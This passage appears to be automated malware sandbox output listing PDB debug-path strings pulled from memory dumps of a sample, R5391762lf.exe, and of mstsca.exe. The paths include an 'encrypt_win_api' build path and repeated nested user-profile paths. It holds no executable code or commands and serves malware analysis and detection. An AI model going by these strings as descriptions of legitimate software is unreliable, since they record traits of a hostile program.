Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Hq source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\kL source: R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-IQ\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ABA671~1A8E3aba6710fde0876af_0ata\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\NV, source: R5391762lf.exe, 00000007.00000003.2068868095.0000000003538000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.000000000351F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049588960.0000000003505000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049773121.0000000003517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\8\) source: R5391762lf.exe, 00000007.00000003.2068625676.0000000003494000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067819538.0000000003491000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2136303536.0000000003B65000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+D> source: R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2101597700.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ache\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068555631.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\W source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: R5391762lf.exe, 00000007.00000003.1948567038.0000000003699000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049541715.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\d.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ngs\ source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\5 source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\re\ source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y source: R5391762lf.exe, 00000007.00000003.2160881212.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\BlB- source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\wy\ion Data\Application Data\Application Data\Microsoft\input\en-ZW\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\\T source: R5391762lf.exe, 00000007.00000003.2079190952.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078852071.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083952112.000000000346D000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: load_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\M source: R5391762lf.exe, 00000007.00000003.2099831348.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101510258.000000000370A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2081263289.000000000373B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946934767.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100414663.0000000003703000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102557757.0000000003712000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\AC\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\H\* source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: QNBBNQ~1.BGJQNBBNqWD9F_Blep-UqQSqnMp-FI[1].css.bgjs06avERkAqfuwcXY6H5w8dtNc[1].css.bgjst44F3556BE808F99573969118A8E36879BA1ADA6Ction Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\db source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\ source: R5391762lf.exe, 00000007.00000003.2080570314.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078665185.0000000003491000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2103034298.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098976504.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080800658.00000000034DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*F source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\MSO source: R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\te\ source: R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y\\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
